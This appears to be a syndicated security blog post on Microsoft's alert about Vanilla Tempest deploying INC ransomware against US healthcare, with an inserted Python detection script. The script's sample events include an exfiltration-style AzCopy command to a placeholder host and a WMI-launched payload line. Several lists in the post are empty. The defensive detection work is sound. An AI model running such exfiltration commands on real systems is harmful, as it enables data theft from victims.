According to a recent Microsoft alert, a financially motivated threat actor has been observed deploying a new INC ransomware strain against the health sector in the United States (US). In this article, we'll look at who the threat actor is and how these attacks are carried out. Let's begin!
Based on the details in the Microsoft alert, threat intelligence teams track this actor under the name Vanilla Tempest; it was previously known as DEV-0832 and as Vice Society.
Since 2021, the threat actor has built a reputation for targeting a range of sectors, including education, healthcare, IT, and manufacturing. Ransomware strains used across these attacks include:
Check Point, a software technologies company, has also connected Vanilla Tempest to the Rhysida ransomware group. That group's attacks likewise targeted the healthcare sector, including an attempt to sell patient data taken from Lurie Children's Hospital in Chicago.
Consistent with its earlier activity as Vice Society, the group is known for using existing lockers in its attacks rather than developing a custom version.
Anyone planning recovery and protection against such threats should know that the INC ransomware named in the Microsoft alert is operated as ransomware-as-a-service (RaaS). Operations using it have targeted both public and private organizations since July 2023. These targets include:
It is worth noting that the source code for INC Ransom's Windows and Linux/ESXi encryptors was offered for sale in May 2024 for $300,000. The seller used the handle "salfetka," and the announcement was posted on the Exploit and XSS hacking forums.
According to the Microsoft alert, the recent cyberattacks on the US healthcare sector are the first time this threat actor has been seen using the INC Ransom tool. Microsoft's threat intelligence team stated in a series of posts on X:
“Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494, before deploying tools like the Supper backdoor, the legitimate AnyDesk remote monitoring and management (RMM) tool, and the MEGA data synchronization tool.”
Once these tools are in place, the attackers move laterally through the compromised network using the Remote Desktop Protocol (RDP). They then use the Windows Management Instrumentation (WMI) Provider Host to deploy the ransomware payload.
Media coverage of the Microsoft alert also reports that the group uses Azure Storage Explorer and AzCopy to exfiltrate sensitive data while trying to evade detection, since both are legitimate Microsoft tools.
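The tool chain above (WMI-launched execution, AnyDesk, MEGA, AzCopy and Azure Storage Explorer) lends itself to a simple host-level triage rule. The script below is an added example, not code from the article, Microsoft or TuxCare; the event records are constructed Sysmon-style process-creation entries, and the stage names, record layout and binary names (`megasync.exe`, `megacmd.exe`, `storageexplorer.exe`) are this example's own assumptions.

```python
"""Triage rules for the Vanilla Tempest tool chain described above (added example;
events below are constructed Sysmon-style records, not incident telemetry)."""
from collections import defaultdict
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent: str   # parent image file name, lower-cased (assumed normalised upstream)
    image: str    # process image file name, lower-cased
    cmdline: str

# Each rule corresponds to one stage the article names; the names are this example's own.
RULES = {
    "rmm_tool_anydesk": lambda e: e.image == "anydesk.exe",
    "sync_tool_mega": lambda e: e.image in ("megasync.exe", "megacmd.exe"),
    "azure_exfil_tooling": lambda e: e.image in ("azcopy.exe", "storageexplorer.exe"),
    # WMI Provider Host rarely launches children; a child under it matches the
    # WMI-based payload deployment the article describes.
    "wmi_provider_spawned_process": lambda e: e.parent == "wmiprvse.exe",
}

def detect(events):
    """Return {host: set of matched stage names} for hosts with at least one hit."""
    stages = defaultdict(set)
    for e in events:
        for name, pred in RULES.items():
            if pred(e):
                stages[e.host].add(name)
    return dict(stages)

def hosts_with_chain(events, min_stages=2):
    """Hosts where several stages co-occur; one hit alone may be legitimate admin use."""
    return sorted(h for h, s in detect(events).items() if len(s) >= min_stages)

# Constructed sample: srv01 shows WMI-launched execution then AzCopy; ws02 only an
# AnyDesk start; ws03 is the provider host itself starting normally (no hit).
SAMPLE = [
    ProcEvent("srv01", "wmiprvse.exe", "cmd.exe", "cmd.exe /c C:\\Temp\\payload-placeholder.exe"),
    ProcEvent("srv01", "cmd.exe", "azcopy.exe", "azcopy copy D:\\share https://example.invalid/c"),
    ProcEvent("ws02", "explorer.exe", "anydesk.exe", "anydesk.exe"),
    ProcEvent("ws03", "svchost.exe", "wmiprvse.exe", "wmiprvse.exe -Embedding"),
]

if __name__ == "__main__":
    for host, found in sorted(detect(SAMPLE).items()):
        print(host, sorted(found))
    print("hosts with chained stages:", hosts_with_chain(SAMPLE))
```

Raising `min_stages` trades recall for fewer false positives, since AnyDesk or AzCopy on its own is common in legitimate administration.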
The rise of Vanilla Tempest and the deployment of INC ransomware against US healthcare highlight the persistent threats facing critical sectors. Organizations must stay vigilant, adopt robust security measures, and closely monitor the evolving tactics of these threat actors to limit potential damage.
The sources for this piece include articles in The Hacker News and Tech Business News.
This is a Security Bloggers Network syndicated blog from TuxCare authored by Wajahat Raja. Read the original post at: https://tuxcare.com/blog/microsoft-alert-new-inc-ransomware-targets-us-healthcare/